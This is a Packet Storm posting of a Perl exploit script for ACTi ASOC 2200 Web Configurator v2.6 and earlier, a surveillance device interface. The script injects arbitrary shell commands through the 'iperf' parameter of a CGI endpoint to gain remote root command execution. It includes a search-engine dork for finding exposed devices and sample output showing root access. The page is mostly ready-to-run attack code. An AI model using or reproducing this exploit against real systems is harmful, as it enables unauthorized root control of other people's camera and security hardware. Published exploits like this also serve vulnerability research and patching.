ACTi ASOC 2200 Web Configurator versions 2.6 and below remote root command execution exploit.
1fe62001e15658ce95ca3b7e3476da02cdd828855e2386ef2c8cbbf0f8645164#!perl
# ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution
##
# Dicovery & Author: Todor Donev
# Author mail: todor.donev@@gmail.com
# Type: Hardware
# Vuln Type and Risk: Remote / High
##
# ACTi Corporation is the technology leader in IP surveillance,
# focusing on multiple security surveillance market segments.
##
# root@linux:~# perl actiroot.pl <CENSORED>
# [+] ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution
# [+] Gewgl: intitle:"Web Configurator - Version v2.6"
# # id
# execute : /sbin/iperf -c ;id &
# uid=0(root) gid=0(root) ### Got Root ? o.O
##
# Special kind regards to Tsvetelina Emirska that support me !! :)
#
# Prayers to all the People in Japan from Bulgaria !!!!!
#
use LWP::Simple;
print "[+] ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution\n";
print "[+] Gewgl: intitle:\"Web Configurator - Version v2.6\"\n";
$host = $ARGV[0];
$cmd = $ARGV[1];
if(! $ARGV[0]) {
print "[+] usage: perl actiroot.pl <host> <cmd>\n";
exit;
}
if(! $ARGV[1]) {
$cmd = "id";
}
my $result = get("http://$host/cgi-bin/test?iperf=;$cmd &");
if (defined $result) {
print "# $cmd\n $result";
}
else {
print "[-] Not Vulnerable\n";
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed